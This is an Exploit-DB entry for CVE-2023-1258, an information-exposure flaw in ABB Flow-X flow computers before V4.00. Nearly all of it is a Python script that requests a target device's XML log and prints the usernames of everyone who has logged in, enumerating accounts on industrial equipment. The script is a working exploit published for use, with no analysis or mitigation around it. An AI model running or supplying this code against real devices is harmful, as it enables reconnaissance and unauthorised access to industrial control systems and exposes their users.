[webapps] ABB FlowX v4.00 - Exposure of Sensitive Information

source link: https://www.exploit-db.com/exploits/51603

EDB-ID: 51603
Platform: Hardware
Date: 2023-07-19

# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
# Date: 2023-03-31
# Exploit Author: Paul Smith
# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series
# Version: ABB Flow-X all versions before V4.00
# Tested on: Kali Linux
# CVE: CVE-2023-1258


#!/usr/bin/python
import sys
import re
from bs4 import BeautifulSoup as BS
import lxml  # not called directly; BeautifulSoup needs it for features="xml"
import requests

# Target URL is taken from the first command-line argument
url = sys.argv[1]


def dump_users():
    response = requests.get(url)

    # Stop on any HTTP status code other than 200
    if response.status_code != 200:
        print('Status:', response.status_code, 'Headers:', response.headers,
              'Error Response:', response.text)
        sys.exit()

    # Parse the XML response and print each "User ... logged in" log entry
    data = response.text
    soup = BS(data, features="xml")
    logs = soup.find_all("log")
    for log in logs:
        test = re.search('User (.*?) logged in', str(log))
        if test:
            print(test.group(0))


def main():
    dump_users()


if __name__ == '__main__':
    main()
